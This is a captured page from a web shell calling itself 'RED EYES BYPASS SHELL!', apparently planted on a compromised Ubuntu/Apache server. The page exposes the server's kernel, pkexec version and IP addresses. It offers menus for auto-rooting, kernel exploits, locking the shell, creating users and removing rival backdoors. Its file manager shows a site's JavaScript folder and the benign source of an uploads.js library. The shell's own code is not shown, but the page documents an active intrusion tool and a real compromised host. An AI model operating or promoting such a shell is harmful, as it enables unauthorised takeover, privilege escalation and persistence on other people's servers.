Linux sothorn202 5.15.0-161-generic #171-Ubuntu SMP Sat Oct 11 08:17:01 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 202.28.82.202 | : 216.73.216.9
pkexec version 0.105
Cant Read [ /etc/named.conf ]
iqtd
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
lifelonglearn /
commert /
accout /
js /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
autocomplete.js
8.04
KB
-rwxr-xr-x
calendar.js
16.46
KB
-rwxr-xr-x
clock.js
2.76
KB
-rwxr-xr-x
common.js
22.6
KB
-rwxr-xr-x
datalist.js
8.23
KB
-rwxr-xr-x
ddmenu.js
7.72
KB
-rwxr-xr-x
ddpanel.js
2.1
KB
-rwxr-xr-x
dragdrop.js
2.62
KB
-rwxr-xr-x
editinplace.js
2.8
KB
-rwxr-xr-x
facebook.js
2.14
KB
-rwxr-xr-x
gajax.js
139.73
KB
-rwxr-xr-x
gbanner.js
7.88
KB
-rwxr-xr-x
google.js
1.9
KB
-rwxr-xr-x
graphs.js
36.78
KB
-rwxr-xr-x
inputgroup.js
3.37
KB
-rwxr-xr-x
loader.js
5.9
KB
-rwxr-xr-x
multiselect.js
2.61
KB
-rwxr-xr-x
pdpa.js
1.73
KB
-rwxr-xr-x
range.js
9.47
KB
-rwxr-xr-x
select.js
8.28
KB
-rwxr-xr-x
spline.js
5.58
KB
-rwxr-xr-x
table.js
19.77
KB
-rwxr-xr-x
uploads.js
11.4
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : uploads.js
/** * GUploads * Javascript multiples upload * * @filesource js/uploads.js * @link https://www.kotchasan.com/ * @copyright 2016 Goragod.com * @license https://www.kotchasan.com/license/ */ (function() { "use strict"; window.GUploads = GClass.create(); GUploads.prototype = { initialize: function(options) { this.options = { form: "", input: "", fileprogress: "", fileext: ["jpg", "jpeg", "gif", "png"], iconpath: WEB_URL + "skin/ext/", onupload: $K.emptyFunction, oncomplete: $K.emptyFunction, customSettings: {} }; Object.extend(this.options, options || {}); this.form = $G(this.options.form); this.frmContainer = document.createElement("div"); this.frmContainer.style.display = "none"; this.form.appendChild(this.frmContainer); this.index = 0; this.count = 0; var input = $G(this.options.input); this.prefix = input.get("id"); this.parent = $G(input.parentNode); this.size = input.get("size"); this.className = input.className; this.name = input.get("name"); this.multiple = window.FormData ? true : false; input.multiple = this.multiple; this.result = $E(this.options.fileprogress); var temp = this; var _doUploadChanged = function(e) { var index = 0; var doProgress = function(val) { $E("bar_" + temp.prefix + "_" + index).style.width = val + "%"; }; var xhr = new GAjax({ onProgress: doProgress, contentType: null }); function _upload(files, i) { var total = 0; if (temp.uploading && i < files.length) { index = i; if ($E("p_" + temp.prefix + "_" + index)) { var f = files[i]; var data = new FormData(); for (var name in temp.options.customSettings) { data.append( name, encodeURIComponent(temp.options.customSettings[name]) ); } data.append("file", f); $G("close_" + temp.prefix + "_" + index).remove(); xhr.send(temp.form.action, data, function(xhr) { var ds = xhr.responseText.toJSON(); if (ds) { if (ds.alert) { $G("result_" + temp.prefix + "_" + index).addClass( "invalid" ).innerHTML = ds.alert; temp.error.push(ds.alert); } } else if (xhr.responseText != "") { $G("result_" + temp.prefix + "_" + index).addClass( "invalid" ).innerHTML = xhr.responseText; temp.error.push(xhr.responseText); } else { $G("p_" + temp.prefix + "_" + index).remove(); total++; } _upload(files, index + 1); }); } else { _upload(files, index + 1); } } else { temp.options.oncomplete.call(temp, temp.error.join("\n"), total); } } if (temp.multiple) { forEach(this.files, function() { var file = temp._ext(this.name); if (temp.options.fileext.indexOf(file.ext) != -1) { temp._display(file); temp.count++; temp.index++; } }); temp.uploading = true; temp.options.onupload.call(temp); _upload(this.files, 0); } else { var file = temp._ext(this.value); if (temp.options.fileext.indexOf(file.ext) != -1) { temp._display(file); var form = document.createElement("form"); form.id = "form_" + temp.prefix + "_" + temp.index; form.action = temp.form.action; temp.frmContainer.appendChild(form); this.removeEvent("change", _doUploadChanged); form.appendChild(this); for (var name in temp.options.customSettings) { $G(form).create("input", { name: name, value: encodeURIComponent(temp.options.customSettings[name]), type: "hidden" }); } temp.count++; temp.index++; var _input = $G(temp.parent).create("input", { id: temp.prefix + temp.index, name: temp.name, class: temp.className, type: "file" }); _input.addEvent("change", _doUploadChanged); } else { alert(trans("The type of file is invalid")); } } }; input.addEvent("change", _doUploadChanged); this.uploading = false; this.error = new Array(); var _submit = function(forms, index) { var total = 0; var id = forms[index].id; var result = $E(id.replace("form_", "result_")); $G(id.replace("form_", "close_")).remove(); result.className = "icon-loading"; var frm = new GForm(id); frm.result = result; frm.submit(function(xhr) { var ds = xhr.responseText.toJSON(); if (ds) { if (ds.alert) { frm.result.innerHTML = ds.alert; frm.result.className = "icon-invalid"; temp.error.push(ds.alert); } } else if (xhr.responseText != "") { frm.result.innerHTML = xhr.responseText; frm.result.className = "icon-invalid"; temp.error.push(xhr.responseText); } else { frm.result.className = "icon-valid"; total++; } index++; if (index < forms.length && temp.uploading) { _submit.call(temp, forms, index); } else { temp.options.oncomplete.call(temp, temp.error.join("\n"), total); } }); }; this.form.addEvent("submit", function(e) { GEvent.stop(e); if (!temp.uploading && temp.index > 0) { temp.uploading = true; $E(temp.prefix + temp.index).disabled = "disabled"; temp.options.onupload.call(temp); total = 0; _submit(temp.frmContainer.getElementsByTagName("form"), 0); } }); }, cancel: function() { this.uploading = false; }, _ext: function(name) { var obj = new Object(); var files = name.replace(/\\/g, "/").split("/"); obj.name = files[files.length - 1]; var exts = obj.name.split("."); obj.ext = exts[exts.length - 1].toLowerCase(); return obj; }, _display: function(file) { var p = document.createElement("p"); this.result.appendChild(p); p.id = "p_" + this.prefix + "_" + this.index; var img = document.createElement("img"); img.src = this._getIcon(file.ext); p.appendChild(img); var span = document.createElement("span"); span.innerHTML = file.name; p.appendChild(span); var a = document.createElement("a"); a.className = "icon-delete"; a.id = "close_" + this.prefix + "_" + this.index; p.appendChild(a); var temp = this; callClick(a, function() { temp._remove(this.id.replace("close_" + temp.prefix + "_", "")); }); var span = document.createElement("span"); p.appendChild(span); span.id = "result_" + this.prefix + "_" + this.index; if (this.multiple) { var bar = document.createElement("span"); bar.className = "bar_graphs"; p.appendChild(bar); var span = document.createElement("span"); span.className = "value_graphs"; span.id = "bar_" + this.prefix + "_" + this.index; bar.appendChild(span); } }, _getIcon: function(ext) { var icons = new Array( "file", "aiff", "avi", "bmp", "c", "cpp", "css", "dll", "doc", "docx", "exe", "flv", "gif", "htm", "html", "iso", "jpeg", "jpg", "js", "midi", "mov", "mp3", "mpg", "ogg", "pdf", "php", "png", "ppt", "pptx", "psd", "rar", "rm", "rtf", "sql", "swf", "tar", "tgz", "tiff", "txt", "wav", "wma", "wmv", "xls", "xml", "xvid", "zip" ); var i = icons.indexOf(ext); i = i > 0 ? i : 0; return this.options.iconpath + icons[i] + ".png"; }, _remove: function(index) { $G("p_" + this.prefix + "_" + index).remove(); $G("form_" + this.prefix + "_" + index).remove(); this.count--; } }; })(); function initGUploads(form_id, id, model, module_id) { var patt = /^(delete)_([0-9]+)(_([0-9]+))?$/, form = $G(form_id); if (G_Lightbox === null) { G_Lightbox = new GLightbox(); } else { G_Lightbox.clear(); } var _doDelete = function() { var cs = new Array(); forEach(form.elems("a"), function() { if (this.className == "icon-check") { var hs = patt.exec(this.id); cs.push(hs[2]); } }); if (cs.length == 0) { alert(trans("Please select at least one item").replace(/XXX/, this.innerHTML)); } else if (confirm(trans("You want to XXX the selected items ?").replace(/XXX/, this.innerHTML))) { _action("action=deletep&mid=" + module_id + "&aid=" + id + "&id=" + cs.join(",")); } }; var _doAction = function(e) { var hs = patt.exec(this.id); if (hs[1] == "delete") { this.className = this.className == "icon-check" ? "icon-uncheck" : "icon-check"; } GEvent.stop(e); return false; }; function _action(q) { send("index.php/" + model, q, doFormSubmit); } forEach(form.elems("a"), function() { var hs = patt.exec(this.id); if (hs) { G_Lightbox.add(this.parentNode); callClick(this, _doAction); } }); new GDragDrop(form_id, { endDrag: function() { var elems = new Array(); forEach($G(form_id).elems("figure"), function() { if (this.id) { elems.push(this.id.replace("L_", "")); } }); if (elems.length > 1) { _action("action=sort&mid=" + module_id + "&aid=" + id + "&id=" + elems.join(",")); } } }); var _setSel = function() { var chk = this.id == "selectAll" ? "icon-check" : "icon-uncheck"; forEach(form.elems("a"), function() { var hs = patt.exec(this.id); if (hs && hs[1] == "delete") { this.className = chk; } }); }; var galleryUploadResult = function(error, count) { if (error != "") { alert(error); } if (count > 0) { alert(trans("Successfully uploaded XXX files").replace("XXX", count)); } if (loader) { loader.reload(); } else { window.location.reload(); } }; var upload = new GUploads({ form: form_id, input: "fileupload_tmp", fileprogress: "fsUploadProgress", oncomplete: galleryUploadResult, onupload: function() { $E("btnCancel").disabled = false; }, customSettings: { albumId: id } }); callClick("btnCancel", function() { upload.cancel(); }); callClick("btnDelete", _doDelete); callClick("selectAll", _setSel); callClick("clearSelected", _setSel); }
Close